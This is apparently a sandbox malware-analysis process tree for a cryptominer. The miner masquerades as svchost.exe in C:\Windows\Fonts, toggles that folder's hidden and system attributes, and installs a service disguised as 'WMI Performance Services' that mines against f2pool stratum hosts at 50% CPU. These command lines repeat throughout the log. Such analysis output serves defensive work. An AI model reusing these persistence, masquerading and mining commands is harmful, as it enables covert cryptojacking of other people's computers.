c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5360

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5312

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:3780

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6020

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:6012

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6004

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5996

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5776

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4728

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6828

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5324

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4556

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5480

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5348

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4548

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:6836

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5668

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4272

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4428

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:1464

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:2900

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5952

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5908

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6200

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6784

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:504

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4844

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:6180

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4744

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4572

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6624

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:1040

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4848

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5872

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5812

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6916

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5164

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5860

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:944

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5724

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5800

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:6972

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6776

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6768

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6760

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6752

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6744

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:584

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6840

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6300

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:6176

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6292

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6284

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Drops file in Windows directory
PID:3240

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6276

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6268

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6260

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6236

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6272

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Executes dropped EXE
PID:2764

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4844

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5716

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1676

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3704

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:1124

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:2652

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5864

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4796

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5068

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3452

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4896

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4060

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4716

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:2244

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4376

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5544

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2020

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5752

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:2160

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4336

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Drops file in Windows directory
PID:2156

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5636

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5436

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1488

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
- Drops file in Windows directory
PID:3716

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:7036

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:816

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5832

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4260

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6696

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6692

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6632

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:5260

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3156

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6208

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4496

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Drops file in Windows directory
PID:6084

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5136

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:2536

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6292

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4408

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:2160

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6612

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:3780

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:3816

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6900

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2244

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5416

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6512

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5264

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5276

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5464

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5572

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6976

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5156

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6048

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:7016

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:3848

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5708

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5816

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2120

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3240

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6948

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6924

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:7016

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6268

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2664

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5516

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1156

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:6268

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:6968

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:7076

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4660

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5820

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5616

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5320

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6896

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:6948

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6876

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4504

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6228

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2588

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:7100

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:816

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5152

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Drops file in Windows directory
PID:1956

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6748

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6072

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6440

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5536

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5448

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6016

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Drops file in Windows directory
PID:5228

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6640

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:7116

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
- Drops file in Windows directory
PID:5928

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3772

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3704

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Executes dropped EXE
PID:1968

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6732

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6928

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:3048

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1124

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5308

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6172

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6956

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4428

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:7160

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:3168

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5792

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5632

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5828

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6224

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:1408

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5488

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6396

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6000

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6664

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1488

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:288

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6600

\??\c:\windows\Fonts\svchost.exe
